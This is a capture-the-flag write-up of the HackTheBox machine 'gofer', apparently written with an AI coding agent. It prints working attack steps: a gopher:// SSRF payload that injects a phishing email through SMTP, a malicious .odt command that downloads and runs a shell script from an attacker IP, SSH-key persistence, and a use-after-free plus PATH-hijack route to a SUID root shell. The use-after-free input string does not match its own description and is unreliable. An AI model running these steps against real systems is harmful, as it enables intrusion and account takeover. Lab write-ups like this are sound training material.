HTB: gofer Writeup

Machine Information

Machine Rating

⭐⭐⭐⭐☆ (8.0/10)

Difficulty Assessment:

• Enumeration: ⭐⭐⭐⭐☆
• Real-world: ⭐⭐⭐⭐☆
• CVE: ⭐⭐⭐⭐☆
• CTF-like: ⭐⭐⭐⭐☆

Summary

gofer is a Hard-difficulty Linux machine requiring multi-stage exploitation. The attack chain leverages CVE-2023-2255 (LibreOffice command injection), an SSRF vulnerability in a web proxy, Samba enumeration, and a Use-After-Free vulnerability in a custom SUID binary. Initial access is gained through phishing a user with a malicious .odt file via SMTP-through-SSRF, leading to reverse shell as jhudson. Privilege escalation exploits a memory safety bug in the notes binary to become root.

TL;DR: Enum Samba → Find SSRF proxy → Use gopher:// to reach SMTP → Phish user with malicious .odt (CVE-2023-2255) → Reverse shell → Exploit Use-After-Free in SUID notes binary → Root.

Reconnaissance

Port Scanning

nmap -sC -sV -p- 10.129.129.162

Results:

22/tcp   open  ssh      OpenSSH 8.4p1 Debian
25/tcp   filtered smtp  (Postfix)
80/tcp   open  http     Apache httpd 2.4.56
139/tcp  open  netbios-ssn  Samba smbd 4.6.2
445/tcp  open  microsoft-ds  Samba smbd 4.6.2

Service Enumeration

Hostname: gofer.htb Subdomain: proxy.gofer.htb

echo "10.129.129.162 gofer.htb proxy.gofer.htb" >> /etc/hosts

Samba Enumeration:

enum4linux 10.129.129.162
smbclient -L //10.129.129.162 -N
smbclient //10.129.129.162/shares -N

Enumerated Users (via RID cycling): jhudson, jdavis, tbuckley, ablake

SMB Shares:

• shares (anonymous read access) - contains .backup folder with sensitive documents
• print$ (denied)

Subdomain Discovery:

wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://gofer.htb -H "Host: FUZZ.gofer.htb"

Result: proxy.gofer.htb - a web proxy service with SSRF vulnerability (vulnerable parameter: index.php?url=)

Vulnerability Assessment

Identified Vulnerabilities:

• SSRF in proxy.gofer.htb — The web proxy accepts arbitrary URLs via index.php?url= parameter. Gopher protocol can be used to bypass firewall restrictions on internal SMTP (port 25).
• CVE-2023-2255 (LibreOffice command injection) — Malicious .odt files can execute arbitrary commands when opened.
• Use-After-Free in /usr/local/bin/notes — Custom SUID binary with memory safety vulnerability enabling privilege escalation to root.

Initial Foothold

Exploitation Path

Stage 1: Samba Enumeration & Information Gathering

smbclient //10.129.129.162/shares -N
cd .backup
ls -la
get email.txt

The backup folder contained an email from jdavis to tbuckley revealing:

• Jocelyn (jhudson) is a phishing target who clicks links without attention
• Documents are sent internally via mail in .odt format
• Tom (tbuckley) is implementing a web proxy that needs access restrictions

Stage 2: SSRF-based SMTP Injection

The proxy at proxy.gofer.htb/index.php?url= is vulnerable to SSRF. Port 25 (SMTP) is filtered externally but reachable internally.

Craft a gopher:// URL to reach internal SMTP via SSRF:

curl "http://proxy.gofer.htb/index.php?url=gopher://localhost:25/_MAIL%20FROM%3Attacker%40attacker.com%0ARCPT%20TO%3Ajhudson%40gofer.htb%0ADATA%0ASubject%3A%20Check%20this%20document%0A%0AClick%20here:%20http://10.10.14.127:8081/test.odt%0A%0A."

Stage 3: CVE-2023-2255 Exploit - Malicious .odt File

Create a weaponized .odt file that executes shell commands:

python3 CVE-2023-2255.py --cmd 'wget http://10.10.14.127:8081/shell.sh;chmod +x shell.sh;./shell.sh' --output 'test.odt'

Host the .odt file on a simple HTTP server and wait for jhudson to download and open it.

Stage 4: Reverse Shell as jhudson

When jhudson opens test.odt, the CVE-2023-2255 vulnerability triggers the embedded command, executing shell.sh and providing a reverse shell callback.

Stabilize the connection with SSH key:

ssh-keygen -t rsa -f id_rsa -N ""
echo "$(cat id_rsa.pub)" >> /home/jhudson/.ssh/authorized_keys
ssh -i id_rsa jhudson@10.129.129.162

User Compromise

At this stage, we have obtained a reverse shell and SSH access as user jhudson.

Enumeration for Privilege Escalation

id
sudo -l
find / -perm -4000 -type f 2>/dev/null

Key Findings:

• Apache htpasswd hash found: tbuckley:$apr1$YcZb9OIz$fRzQMx20VskXgmH65jjLh
• SUID binary discovered: /usr/local/bin/notes - This is the privilege escalation vector

User Flag

cat ~/user.txt

🚩 User Flag: <REDACTED>

Privilege Escalation

Binary Reverse Engineering

The SUID binary /usr/local/bin/notes was analyzed using Cutter/Ghidra:

cutter /usr/local/bin/notes
# or
ghidra /usr/local/bin/notes

Binary Analysis Results:

The notes binary provides the following functionality:

• Option 1: Create user (allocates 40 bytes: 24 bytes for username + 16 bytes for role)
• Option 2: List users
• Option 3: Delete user (frees memory but does NOT null the pointer - Use-After-Free vulnerability!)
• Option 4: Create note (allocates 40 bytes at same memory location)
• Option 8: Check if admin (if role == “admin”, prints “Access_granted” and executes tar command via system() without absolute path)

Exploitation Strategy: Use-After-Free Memory Corruption

The vulnerability chain:

1. Create a user (allocates 40 bytes, populates username field)
2. Delete the user (frees memory, but pointer still exists in structure)
3. Create a note (re-allocates at same memory location, allowing us to overwrite freed memory)
4. Craft the note with exactly 24 bytes for the username field + “admin” as the role
5. Option 8 checks if admin and calls system(“tar”) with relative path
6. Since we control PATH, we can execute a fake tar script

Exploitation Steps

Step 1: Create malicious tar script in /tmp

cat > /tmp/tar << 'EOF'
#!/bin/bash
cp /bin/bash /tmp/bash
chmod +s /tmp/bash
EOF
chmod +x /tmp/tar

Step 2: Modify PATH to prioritize /tmp

export PATH=/tmp:$PATH
echo $PATH

Step 3: Run the notes binary and exploit UAF

/usr/local/bin/notes
# At the interactive prompt:
# Press 1: Create user (enter any username)
# Press 3: Delete user (triggers free without nulling pointer)
# Press 4: Create note (enter 24 A's followed by "admin": "AAAAAAAAAAAAAAAAAAAAAAAAAADMIN")
# Press 8: Check admin status (triggers Access_granted + system("tar"))

Our malicious /tmp/tar executes, creating a SUID bash shell.

Step 4: Escalate to root

/tmp/bash -p
id

Root Flag

cat /root/root.txt

🚩 Root Flag: <REDACTED>

Attack Chain Summary

graph TD
    A["Reconnaissance:<br/>nmap, enum4linux, wfuzz"] -->|Found Samba shares| B["Anonymous Samba Access<br/>Download .backup folder"]
    B -->|Discover SMTP phishing<br/>opportunity| C["Subdomain Discovery<br/>proxy.gofer.htb identified"]
    C -->|SSRF proxy found| D["Gopher:// SSRF Injection<br/>Bypass firewall to SMTP"]
    D -->|Reach internal SMTP| E["CVE-2023-2255 Exploit<br/>Create malicious .odt"]
    E -->|Send phishing email| F["jhudson opens .odt<br/>Reverse shell callback"]
    F -->|User shell obtained| G["Find SUID binary<br/>/usr/local/bin/notes"]
    G -->|Binary analysis| H["Use-After-Free UAF<br/>Memory corruption"]
    H -->|Exploit UAF| I["Create fake tar in PATH<br/>Execute as root"]
    I -->|ROOT ACCESS| J["Root shell obtained<br/>Mission complete"]

Tools Used

Vulnerability Reference

Key Learnings

• Thorough Enumeration is Critical: Every open port and service (Samba, web proxies) can reveal sensitive information or unintended functionality. Enum4linux RID cycling revealed valid usernames for targeting.

• Document Formats Are Attack Vectors: Modern office document formats (.odt, .docx) are compound archives that can embed executable code. CVE-2023-2255 demonstrates how LibreOffice’s macro/scripting capabilities can be weaponized.

• SSRF with Alternative Protocols: Standard firewall rules block direct outbound connections to internal services, but SSRF via proxy + gopher:// protocol can bypass these restrictions. Always consider alternative protocols when standard approaches fail.

• Phishing Combined with Code Injection: Social engineering (finding a target known to click links) combined with exploitable file formats is a powerful attack chain for initial compromise.

• Memory Safety in SUID Binaries: Custom SUID binaries are high-value targets. Use-After-Free vulnerabilities can be exploited to corrupt memory and achieve privilege escalation. Reverse engineering tools (Cutter, Ghidra) are essential for analyzing binary security.

• Relative Path Execution in Privileged Context: Commands executed via system() in SUID binaries with relative paths (e.g., system("tar") instead of system("/bin/tar")) allow PATH hijacking for privilege escalation.

• Defense-in-Depth Failures: This machine demonstrates how chained vulnerabilities (SSRF → phishing → RCE → UAF → root) can completely compromise a system despite individual protections.

Author

Writeup Creator: Claude Code

Original Machine Author: slartibartfastibest (HackTheBox)

Disclaimer

This writeup is for educational purposes only. All activities described were performed in a controlled, legal environment (HackTheBox platform). Unauthorized access to computer systems is illegal.

Last Updated: 08 Mar 2026

Tags: #HackTheBox #Linux #Hard #CVE-2023-2255 #SSRF #UseAfterFree #LibreOffice #ReverseEngineering